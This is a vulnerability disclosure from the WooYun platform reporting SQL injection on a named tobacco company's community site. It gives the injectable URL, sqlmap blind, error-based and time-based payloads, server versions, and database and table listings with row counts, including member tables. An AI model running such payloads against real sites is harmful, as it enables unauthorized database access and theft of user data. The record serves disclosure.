当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169165

漏洞标题:红云红河烟草(集团)有限责任公司某站SQL注入

相关厂商:红云红河烟草(集团)有限责任公司

漏洞作者: 蝶.!

提交时间:2016-01-17 22:14

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

红云红河烟草(集团)有限责任公司某站SQL注入

详细说明:

注入点:http://club.zerone.me/space.php?uid=14208&do=blog&id=69562

sqlmap identified the following injection point(s) with a total of 4089 HTTP(s) requests:
---
Parameter: uid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: uid=14208 RLIKE (SELECT (CASE WHEN (6623=6623) THEN 14208 ELSE 0x28 END))&do=blog&id=69562
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: uid=14208 AND (SELECT 1884 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT (ELT(1884=1884,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&do=blog&id=69562
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: uid=14208 AND (SELECT * FROM (SELECT(SLEEP(5)))jGrv)&do=blog&id=69562
---
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] uc_hhtest
[*] uchome_hhtest
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: uc_hhtest
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| uc_members          | 181769  |
| uc_memberfields     | 133594  |
| uc_friends          | 98153   |
| uc_members_copy     | 33783   |

漏洞证明:

web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: uchome_hhtest
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| panda_card              | 4310000 |
| rd_ticketdate           | 1021335 |
| uchome_comment          | 427626  |
| ip_addr                 | 379739  |
| uchome_friend           | 316635  |
| uchome_pic              | 301699  |
| uchome_post             | 205451  |
| cr_ticketdate           | 150343  |
| uchome_space            | 143744  |
| uchome_spacefield       | 143744  |
| uchome_member           | 143716  |
| uchome_notification     | 128831  |
| uchome_poke             | 127263  |
| wyyn_tj_copy            | 108158  |
| wyyn_cent               | 63828   |
| uchome_blogfield        | 51134   |
| uchome_blog             | 51041   |
| wyyn_cent_2             | 47307   |
| uchome_thread           | 45734   |
| uchome_member_copy      | 32810   |
| uchome_member_copy1     | 32799   |
| uchome_space_copy1      | 32777   |
| uchome_spacefield_copy1 | 32777   |
| uchome_space_copy       | 32766   |
| uchome_spacefield_copy  | 32766   |
| uchome_tagblog          | 29405   |
| chun_tj                 | 29070   |
| uc_members_copy         | 27534   |
| wyyn_member             | 21645   |
| wyyn_statemember        | 21643   |
| wyyn3_statemember       | 20760   |
| wyyn_wj                 | 20666   |
| wyyn_statemember_9      | 20249   |
| wyyn_statemember_8      | 19821   |
| wyyn_statemember_7      | 19384   |
| wyyn_statemember_6      | 18636   |
| cr_ticketpeople         | 18445   |
| wyyn_cent_1             | 18311   |
| wyyn_statemember_5      | 17529   |
| wyyn_statemember_4      | 16376   |
| wyyn_statemember_3      | 14898   |
| panda_list              | 14792   |
| uchome_invite           | 14508   |
| uchome_userapp          | 12262   |
| ck_isck                 | 11439   |
| uchome_tag              | 11375   |
| uch_tobacco_ground      | 8816    |
| wyyn_statemember_2      | 8166    |
| uchome_tagspace         | 8002    |
| wyyn_tj                 | 7895    |
| uchome_spacelog         | 7606    |
| uchome_usertask         | 6992    |
| cr_ticket               | 6658    |
| rd_ticketpeople         | 6602    |
| uchome_myinvite         | 4825    |
| fl_list                 | 3838    |
| uch_tobacco             | 3785    |
| wyyn_statemember_091008 | 3666    |
| wyyn_statemember_1      | 3666    |
| wyyn_invte              | 3325    |
| uch_hhlink              | 3279    |
| uchome_feed             | 3254    |
| cr_task                 | 3227    |
| club_area               | 3144    |
| user_collect_1          | 2692    |
| uch_tobacco_zhongzi     | 2582    |
| user_collect_1_1        | 2490    |
| uch_hhfind              | 2466    |
| fl_heart                | 2383    |
| fl_quest                | 2383    |
| fl_sub                  | 2383    |
| uch_cars                | 2205    |
| `user`                  | 2034    |
| uchome_album            | 1987    |
| uchome_share            | 1869    |
| chun_list               | 1654    |
| chun_list_01            | 1577    |
| uchome_spacefieldcom    | 1364    |
| uch_tobacco_product     | 1206    |
| chun_list_03            | 1158    |
| chun_list_02            | 1126    |
| chun_list_04            | 1048    |
| uchome_doing            | 829     |
| app_online              | 564     |
| qq_long                 | 550     |
| uchome_saver            | 514     |
| app_online2             | 458     |
| uchome_mtaginvite       | 450     |
| club_city               | 345     |
| uchome_class            | 319     |
| pic_count               | 287     |
| wyyn_tk                 | 215     |
| uch_music               | 213     |
| uchome_docomment        | 168     |
| uchome_myapp            | 167     |
| uchome_mtag             | 160     |
| uchome_userlog          | 158     |
| appetsy                 | 103     |
| app_webapp_pic          | 86      |
| uchome_config           | 83      |
| uchome_data             | 67      |
| uchome_report           | 60      |
| reader_addr             | 57      |
| appsrh                  | 41      |
| p_list                  | 41      |
| uch_dl                  | 35      |
| uchome_blacklist        | 35      |
| club_province           | 34      |
| rtwo                    | 30      |
| wyyn3_cardget           | 29      |
| chun_postab             | 28      |
| `2010pl`                | 27      |
| vip_list                | 25      |
| wyyn_2cj                | 25      |
| wyyn_2cj_4              | 25      |
| wyyn_2cj_5              | 25      |
| wyyn_2cj_6              | 25      |
| wyyn_2cj_7              | 25      |
| wyyn_2cj_8              | 25      |
| chun_postab_3           | 24      |
| app_webapp              | 22      |
| wyyn_2cj_1              | 21      |
| chun_postab_02          | 20      |
| wyyn_2cj_2              | 20      |
| wyyn_2cj_3              | 20      |
| apptxjh                 | 18      |
| chun_postab_01          | 16      |
| bbs_typename            | 14      |
| uchome_checkusermail    | 12      |
| zp_bm                   | 12      |
| uchome_usergroup        | 11      |
| cr_ticketname           | 8       |
| rd_ticket               | 7       |
| uchome_checkuserphone   | 6       |
| uchome_checkuserpost    | 6       |
| uchome_task             | 6       |
| uchome_cron             | 5       |
| uchome_friendlog        | 5       |
| uchome_profilefield     | 5       |
| apppassat               | 3       |
| rd_ticketname           | 3       |
| uchome_profield         | 3       |
| gps_map                 | 2       |
| uch_tobacco_grass       | 2       |
| uchome_log              | 2       |
| vip_shop                | 2       |
| chun_sum                | 1       |
| uchome_session          | 1       |
| uchome_show             | 1       |
| wyyn_sum                | 1       |
| wyyn_sum_copy           | 1       |
| wyyn_ykc                | 1       |
+-------------------------+---------+

修复方案:

版权声明:转载请注明来源 蝶.!@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-20 15:08

厂商回复:

CNVD确认未复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无